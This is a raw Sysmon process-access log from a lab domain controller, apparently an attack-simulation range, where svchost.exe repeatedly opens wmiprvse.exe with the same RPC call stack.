13:30:32.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012836Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012835Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012834Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012833Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012832Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012831Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012830Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012829Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012828Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012827Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012826Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012825Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012824Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012823Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012822Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012821Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012820Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012819Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012818Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012817Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012816Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012815Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012814Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012813Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:31.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013010Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 